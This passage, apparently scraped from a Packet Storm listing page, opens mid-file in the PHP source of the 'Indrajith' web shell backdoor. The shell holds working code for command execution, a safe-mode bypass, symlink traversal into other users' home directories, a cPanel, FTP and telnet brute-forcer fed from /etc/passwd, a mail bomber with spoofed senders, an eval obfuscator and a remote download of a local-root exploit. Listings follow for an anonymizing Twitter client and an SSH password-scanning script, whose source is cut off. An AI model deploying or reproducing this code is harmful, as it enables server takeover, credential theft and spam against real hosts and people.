"a+"); if($s_handle) { fwrite($s_handle, $s_file); alert("Operation Succeed!!!"); } else { alert("Access Denied!!!"); } fclose($s_handle); } } function safe_mode_fuck_ui() { global $path; $path=getcwd(); echo "<div id=result><br /><center><h2>Select Your Options</h2><hr /> <table class=tbl size=10><tr><td><a href=?path={$path}&safe_mode=s_php_ini>PHP.INI</a></td><td><a href=??path={$path}&safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=??path={$path}&safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>"; } function AccessDenied() { global $path, $forbid_dir; $path=$_GET['path']; chdir($path); if(function_exists('fopen') && function_exists('fwrite')) { $forbid=fopen(".htaccess", "wb"); if($forbid) { fwrite($forbid, $forbid_dir); alert("Opreation Succeeded"); } else { alert("Access Denied"); } fclose($forbid); } } function sym_link() { cmd('rm -rf AKP'); mkdir('AKP', 0777); $usrd = array(); $akps = @implode(@file("/etc/named.conf")); if(!$file) { echo("<div id=result><center><h2>Not Found</h2><hr /><font color=red>Sorry, bind file </font>( <font color=green>/etc/named.conf</font> )<font color=red> Not Found</font><br /><br /><hr /><br /><br />"); } else { $htaccess=@fopen('AKP/.htaccess', 'w'); fwrite($htaccess,$sym_htaccess); $php_ini_x=fopen('AKP/php.ini', 'w'); fwrite($php_ini_x, $sym_php_ini); symlink("/", "AKP/root"); echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>"; foreach($akps as $akp) { if(eregi("zone", $akp)) { preg_match_all('#zone "(.*)" #', $akp, $akpzz); flush(); if(strlen(trim($akpzz[1][0]))>2) { $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href=/AKP/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr></table>"; flush(); } } } } } function php_ende_ui() { echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl> <tr><td> Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr> </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE For Encode Input your full source code. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>"; } function php_ende_bg() { $meth_d=$_POST['typed']; $typ_d=$_POST['typenc']; $c_ntent=$_POST['php_content']; $c_ntent=$c_ntent; switch($meth_d) { case "Encode": switch($typ_d) { case "GZINFLATE": $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>"; break; case "GZUNCOMPRESS": $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>"; break; case "STR_ROT13": $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>'); $res_t=base64_encode(str_rot13($res_t)); $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>"; break; } break; case "Decode": switch($typ_d) { case "GZINFLATE": $res_t=gzinflate(base64_decode($c_ntent)); break; case "GZUNCOMPRESS": $res_t=gzuncompress(base64_decode($c_ntent)); break; case "STR_ROT13": $res_t=str_rot13(base64_decode($c_ntent)); break; } break; } echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>"; } function massmailer_ui() { echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail </textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td> <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing </textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>"; } function massmailer_bg() { $from=$_POST['from']; $to=$_POST['to_mail']; $subject=$_POST['subject_mail']; $message=$_POST['mail_content']; if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... </font><br /><br /><hr /><br /><br />"; } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... </font><br /><br /><hr /><br /><br />"; } } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... </font><br /><br /><hr /><br /><br />"; } } function mailbomb_bg() { $rand=rand(0, 9999999); $to=$_POST['bomb_to']; $from="president_$rand@whitewhitehouse.gov"; $subject=$_POST['bomb_subject']." ID ".$rand; $times=$_POST['bomb_no']; $content=$_POST['bmail_content']; if($times=='') { $times=1000; } while($times--) { if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... </font><br /><br /><hr /><br /><br />"; } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... </font><br /><br /><hr /><br /><br />"; } } else { echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... </font><br /><br /><hr /><br /><br />"; } } } /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ /*------------------------ Credit Goes to Them ---------------------------------*/ function cpanel_check($host,$user,$pass,$timeout) { set_time_limit(0); global $cpanel_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>"; exit; } else if (curl_errno($ch) == 0 ) { print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } function cpanel_crack() { set_time_limit(0); global $os; echo "<div id=result>"; $cpanel_port="2082"; $connect_timeout=5; if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) { ?> <center> <form method=post> <table class=tbl> <tr> <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td> </tr> <tr> <td align=center>User names</td><td align=center>Password</td> </tr> <tr> <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php if($os != "win") { if(@file('/etc/passwd')) { $users = file('/etc/passwd'); foreach($users as $user) { $user = explode(':', $user); echo $user[0] . "\n"; } } else { $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } $temp = trim($temp); if($file5 = fopen("test.txt","w")) { fputs($file5,$temp); fclose($file5); $file = fopen("test.txt", "r"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo $matches; } fclose($file); } } } ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td> </tr> <tr> <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td> </tr> <tr> <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td> </tr> <tr> <td align=center colspan=2><input type="submit" value=" Go " class=but></td> </tr> </table> </form> </center> <?php } else { if(empty($_POST['username']) || empty($_POST['password'])) echo "<center>Please Enter The Users or Password List</center>"; else { $userlist=explode("\n",$_POST['username']); $passlist=explode("\n",$_POST['password']); if($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if($cracktype == "telnet") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800> Processing user $pureuser ...</font></b><br><br>"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } } } echo "</div>"; } function get_users() { $userz = array(); $user = file("/etc/passwd"); foreach($user as $userx=>$usersz) { $userct = explode(":",$usersz); array_push($userz,$userct[0]); } if(!$user) { if($opd = opendir("/home/")) { while(($file = readdir($opd))!== false) { array_push($userz,$file); } } closedir($opd); } $userz=implode(', ',$userz); return $userz; } function exploit_details() { global $os; echo "<div id=result style='color:green;'><center> <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td> OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr> <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr> <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr> <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td> <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr> <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>"; if(function_exists('apache_get_modules')) { echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>"; echo implode(', ', apache_get_modules()); echo "</font></tr></td>"; } if($os=='win') { echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr> <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr> "; } if($os=='nix') { echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr> <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr> <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr> <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr> <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr> <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr> <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr> <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr> <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr> <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>"; $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $uze=array(); foreach($useful as $uzeful) { if(cmd("which $uzeful")) { $uze[]=$uzeful; } } echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $uze=array(); foreach($downloaders as $downloader) { if(cmd("which $downloader")) { $uze[]=$downloader; } } echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>"; echo implode(', ',$uze); echo "</pre></td></tr>"; echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr> <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>"; } echo "</table><br /><br /><hr /><br /><br />"; } function remote_file_check_ui() { echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br /> <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr> <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php ajithkp560.php index.html profile.php c99.php r57.php</textarea></td></tr> <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />"; } function remote_file_check_bg() { set_time_limit(0); $rtr=array(); echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>"; $webz=$_POST['rem_web']; $uri_in=$_POST['tryzzz']; $r_xuri = trim($uri_in); $r_xuri=explode("\n", $r_xuri); foreach($r_xuri as $rty) { $urlzzx=$webz.$rty; if(function_exists('curl_init')) { echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>"; $ch = curl_init($urlzzx); curl_setopt($ch, CURLOPT_NOBODY, true); curl_exec($ch); $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if($status_code==200) { echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>"; } else { echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>"; } } else { echo "<font color=red>cURL Not Found</font>"; } } echo "</table><br /><br /><hr /><br /><br /></div>"; } function remote_download_ui() { echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr> <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr> <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>"; } function remote_download_bg() { chdir($_GET['path']); global $os; $opt=$_GET['type_r_down']; $rt_ffile=$_GET['rurlfile']; $name=basename($rt_ffile); echo "<div id=result>"; switch($opt) { case "WGET": if($os!='win') { cmd("wget $rt_ffile"); alert("Downloaded Successfully..."); } else { alert("Its Windows OS... WGET is not available"); } break; case "cURL": if(function_exists('curl_init')) { $ch = curl_init($rt_ffile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($name, $data); alert("Download succeeded"); } else { alert("cURL Not Available"); } break; } echo "</div>"; } function hex_encode_ui() { if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) { $tyx=$_POST['tyxxx']; $rezultzz=$_POST['hexinp']; switch($tyx) { case "Encode": $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; break; case "Decode": $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; break; } } else { echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br /> <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea> <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select> Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>"; } } function about_us() { echo "<div id=result style='boder:1px double dashed #333'><center><h2>About us</h2><hr /><br /><br /> <font color=red><h4>AJITH KP & VISHNU NATH KP</h4></font> We are brothersz & dedicated this to my <br /> <font color=green>\"Father [Devadasan KP] and Mother[Prakasini AP]\"</font><br />My classmates and teachers.<br />and my buddy <font color=orange>SREEJU</font> <br />And all friends, teachers in <font color=green>AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc]</font> <br /><font color=green>Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...<br /> ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.<br /> Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]</font><br /><br /><br /><br /><hr /><br /><br /><br /><br /></center></div>"; } function killme() { global $self; echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... Hope You Like me...<br /><br /><br/><hr /><br /><br />"; $me=basename($self); unlink($me); } //////////////////////////////// Frond End Calls /////////////////////////////// if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) { edit_file_bg(); } else if(isset($_REQUEST['killme'])) { killme(); } else if(isset($_REQUEST['hexenc'])) { hex_encode_ui(); } else if(isset($_REQUEST['about_us'])) { about_us(); } else if(isset($_REQUEST['remotefiledown'])) { remote_download_ui(); } else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) { remote_download_bg(); } else if(isset($_REQUEST['cpanel_crack'])) { cpanel_crack(); } else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) { remote_file_check_bg(); } else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) { php_ende_bg(); } else if(isset($_REQUEST['remote_server_scan'])) { remote_file_check_ui(); } else if(isset($_REQUEST['server_exploit_details'])) { exploit_details(); } else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) { massmailer_bg(); } else if(isset($_REQUEST['mysqlman'])) { mysqlman(); } else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) { mailbomb_bg(); } else if(isset($_REQUEST['cookiejack'])) { cookie_jack(); } else if(isset($_REQUEST['massmailer'])) { massmailer_ui(); } else if(isset($_REQUEST['rename'])) { chdir($_GET['path']); rename_ui(); } else if(isset($_GET['old_name']) && isset($_GET['new_name'])) { chdir($_GET['path']); rename_bg(); } else if(isset($_REQUEST['encodefile'])) { php_ende_ui(); } else if(isset($_REQUEST['edit'])) { edit_file(); } else if(isset($_REQUEST['down'])) { chdir($_GET['path']); download(); } else if(isset($_REQUEST['read'])) { chdir($_GET['path']); code_viewer(); } else if(isset($_REQUEST['perm'])) { chdir($_GET['path']); ch_perm_ui(); } else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) { chdir($_GET['path']); ch_perm_bg(); } else if(isset($_REQUEST['del_fil'])) { chdir($_GET['path']); delete_file(); exit; } else if(isset($_REQUEST['phpinfo'])) { chdir($_GET['path']); ob_clean(); echo phpinfo(); exit; } else if(isset($_REQUEST['del_dir'])) { chdir($_GET['path']); $d_dir=$_GET['del_dir']; deldirs($d_dir); } else if(isset($_GET['path']) && isset($_GET['new_file'])) { chdir($_GET['path']); mk_file_ui(); } else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) { mk_file_bg(); } else if(isset($_GET['path']) && isset($_GET['new_dir'])) { chdir($_GET['path']); create_dir(); } else if(isset($_GET['path']) && isset($_GET['cmdexe'])) { chdir($_GET['path']); cmd(); } else if(isset($_POST['upload_f']) && isset($_POST['path'])) { upload_file(); } else if(isset($_REQUEST['rs'])) { reverse_conn_ui(); } else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) { reverse_conn_bg(); } else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) { chdir($_GET['path']); safe_mode_fuck_ui(); } else if(isset($_GET['path']) && isset($_GET['safe_mode'])) { safe_mode_fuck(); } else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) { AccessDenied(); } else if(isset($_REQUEST['symlink'])) { sym_link(); } else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port'])) { SQL_Shell_bg(); } else if(isset($_GET['path']) && isset($_GET['copy'])) { copy_file_ui(); } else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name'])) { copy_file_bg(); } else { filemanager_bg(); } ////////////////////////////// End Frond End Calls ////////////////////////////// echo "</div><div id=result><center><p><table class='tbl'> <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value=' >> ' /></form></td></tr></table> <table class='tbl'><tr> <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form> </td> <td><form style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form> </td> </tr> <tr> <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form> </td> <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form> </td> </tr> </table></p><p><font size=4 color=green>© <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> ©</font><br />® TOF [2012] ®</div>" ?> /*------------------ LOGIN -------------------*/ $usernameame="ajithkp560"; $password="ajithkp560"; Indrajith Mini PHP Shell Backdoor ? Packet Storm
  5. AnonTwi is a free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. It can leverages proxying, randomization of header values, send fake geolocation data, and more. download: http://packetstormsecurity.org/files/download/119114/anontwi_1.0.tar.gz
  6. HostBox SSH is a python script will scan servers and routers for insecure SSH configurations. INSTALL INSTALLING WXPYTHON ------------------- http://wiki.wxpython.org/InstallingOnUbuntuOrDebian INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko RUNNING HOSTBOX-SSH ------------------- HostBox can run in either console mode or gui mode. To start the app in gui mode simply run the script without arguments. GUI output is sent to console, so it might be good to run it with a xterm. Scans started through the gui will run as a separate thread, so you can start several ssh scans through the gui! Results are logged to the logs/ directory with the time/date of the scan. Only successful logins are logged to file. To run the scanner in console mode the syntax is as: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] Break Option: -1: Break on account login -2: Break on server login The scanner can now handle nmap greppable logs as input, so one can do f.e: nmap -P0 -iR 20000 -p 22 -oG sshscan.log And then.. ./HostBox-SSH.py -i sshscan.log -u guest,test -p -username,blank -2 You can also import nmap greppable logs in the gui and scan through there. When specifying passwords in console or gui you can use "blank" to scan for blank passwords and/or "-username" to scan for the usernames as password. That's about it I guess! I've had very limited time to test the app, so feel free to report bugs/problems at https://stridsmanit.wordpress.com/ssh-scanner/ or drop me a mail: ostridsman@bredband.net. -- Oskar Stridsman's IT Resource: stridsmanIT.wordpress.com -- HostBox-SSH.py #!/usr/bin/python # # Released with GNU GENERAL PUBLIC LICENSE, http://www.gnu.org/licenses/gpl.html # # Tool is written by Oskar Stridsman ostridsman@bredband.net # # Visit Oskar Stridsman's IT Resource - stridsmanIT.wordpress.com # # Released as version 0.1.1 December 01, 2012 import time import sys import os import getopt from wxPython.wx import * import thread import wx import socket import paramiko ID_NEW = 1 ID_RENAME = 2 ID_CLEAR = 3 ID_DELETE = 4 ID_USR = 5 ID_PSW = 6 ID_SCN = 7 SCAN_INDEX = 1 class HostBox(wx.Frame): def __init__(self, parent, id, title): wx.Frame.__init__(self, parent, id, title, size=(946, 686)) panel = wx.Panel(self, -1) hbox = wx.BoxSizer(wx.HORIZONTAL) self.scanindex = 1 self.usernames = "admin;root;guest" self.passwords = "blank;password;-username" self.listbox = wx.ListBox(panel, -1) hbox.Add(self.listbox, 1, wx.EXPAND | wx.ALL, 20) vbox = wx.BoxSizer(wx.VERTICAL) btnPanel = wx.Panel(panel, -1) new = wx.Button(btnPanel, ID_NEW, 'Import', size=(90, 30)) ren = wx.Button(btnPanel, ID_RENAME, 'Rename', size=(90, 30)) dlt = wx.Button(btnPanel, ID_DELETE, 'Delete', size=(90, 30)) clr = wx.Button(btnPanel, ID_CLEAR, 'Clear', size=(90, 30)) setusr = wx.Button(btnPanel, ID_USR, 'Set Usernames', size=(120, 30)) setpass = wx.Button(btnPanel, ID_PSW, 'Set Passwords', size=(120, 30)) startscan = wx.Button(btnPanel, ID_SCN, 'Start Scan', size=(120, 30)) self.skipacc = wxCheckBox ( btnPanel,-1, 'skip on successful account login' ) self.skipsrv = wxCheckBox ( btnPanel,-1, 'skip on successful server login' ) self.Bind(wx.EVT_BUTTON, self.NewItem, id=ID_NEW) self.Bind(wx.EVT_BUTTON, self.OnRename, id=ID_RENAME) self.Bind(wx.EVT_BUTTON, self.OnDelete, id=ID_DELETE) self.Bind(wx.EVT_BUTTON, self.OnClear, id=ID_CLEAR) self.Bind(wx.EVT_LISTBOX_DCLICK, self.OnRename) self.Bind(wx.EVT_BUTTON, self.Usr, id=ID_USR) self.Bind(wx.EVT_BUTTON, self.Psw, id=ID_PSW) self.Bind(wx.EVT_BUTTON, self.Scan, id=ID_SCN) vbox.Add((-1, 20)) vbox.Add(new) vbox.Add(ren, 0, wx.TOP, 5) vbox.Add(dlt, 0, wx.TOP, 5) vbox.Add(clr, 0, wx.TOP, 5) vbox.Add(setusr, 0, wx.TOP, 5) vbox.Add(setpass, 0, wx.TOP, 5) vbox.Add((-1, 55)) vbox.Add(startscan, 0, wx.TOP, 5) vbox.Add((-1, 55)) vbox.Add(self.skipacc, 0, wx.TOP, 5) vbox.Add(self.skipsrv, 0, wx.TOP, 5) btnPanel.SetSizer(vbox) hbox.Add(btnPanel, 0.6, wx.EXPAND | wx.RIGHT, 20) panel.SetSizer(hbox) self.Centre() self.Show(True) def funcScan(self,hosts,index,skipacc,skipsrv): breakacc = False breaksrv = False users = [] passw = [] if ';' in self.usernames: users = self.usernames.split(';') elif ',' in self.usernames: users = self.usernames.split(',') else: users.append(self.usernames) if ";" in self.passwords: passw = self.passwords.split(';') elif "," in self.passwords: passw = self.passwords.split(',') else: passw.append(self.passwords) pathname = "" localtime = time.asctime( time.localtime(time.time()) ) localtime = localtime.replace(' ', '_') ext = ["logs/",localtime, ".slg"] pathname = pathname.join(ext) flogfile = open(pathname, "w") for h in hosts: s = socket.socket() try: 